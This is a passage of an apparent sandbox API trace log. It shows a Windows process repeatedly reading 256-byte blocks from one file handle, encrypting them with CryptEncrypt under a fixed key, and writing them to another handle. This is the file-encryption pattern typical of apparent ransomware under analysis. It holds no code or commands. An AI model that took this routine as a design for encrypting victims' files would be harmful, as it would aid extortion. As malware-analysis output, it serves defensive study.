pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.950] GetLastError () returned 0x0 [0144.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.950] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.950] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.950] GetLastError () returned 0x0 [0144.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.950] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.950] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.950] GetLastError () returned 0x0 [0144.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.950] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.950] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.950] GetLastError () returned 0x0 [0144.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.951] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.951] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.951] GetLastError () returned 0x0 [0144.951] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.951] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.951] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.951] GetLastError () returned 0x0 [0144.951] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.951] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.951] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.951] GetLastError () returned 0x0 [0144.951] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.951] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.951] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.951] GetLastError () returned 0x0 [0144.951] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.951] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.951] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.951] GetLastError () returned 0x0 [0144.952] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.952] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.952] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.952] GetLastError () returned 0x0 [0144.952] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.952] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.952] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.952] GetLastError () returned 0x0 [0144.952] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.952] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.952] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.952] GetLastError () returned 0x0 [0144.952] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.952] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.952] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.952] GetLastError () returned 0x0 [0144.952] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.952] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.952] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.952] GetLastError () returned 0x0 [0144.952] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.953] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.953] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.953] GetLastError () returned 0x0 [0144.953] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.953] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.953] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.953] GetLastError () returned 0x0 [0144.953] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.953] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.953] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.953] GetLastError () returned 0x0 [0144.953] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.953] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.953] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.953] GetLastError () returned 0x0 [0144.953] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.953] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.953] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.953] GetLastError () returned 0x0 [0144.953] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.953] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.954] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.954] GetLastError () returned 0x0 [0144.954] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.954] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.954] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.954] GetLastError () returned 0x0 [0144.954] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.954] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.954] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.954] GetLastError () returned 0x0 [0144.954] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.954] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.954] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.954] GetLastError () returned 0x0 [0144.954] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.954] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.954] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.954] GetLastError () returned 0x0 [0144.954] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.955] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.955] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.955] GetLastError () returned 0x0 [0144.955] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.955] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.955] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.955] GetLastError () returned 0x0 [0144.955] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.955] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.955] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.955] GetLastError () returned 0x0 [0144.955] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.955] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.955] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.955] GetLastError () returned 0x0 [0144.955] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.955] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.955] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.955] GetLastError () returned 0x0 [0144.955] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.956] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.956] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.956] GetLastError () returned 0x0 [0144.956] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.956] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.956] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.956] GetLastError () returned 0x0 [0144.956] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.956] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.956] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.956] GetLastError () returned 0x0 [0144.956] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.956] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.957] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.957] GetLastError () returned 0x0 [0144.957] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, 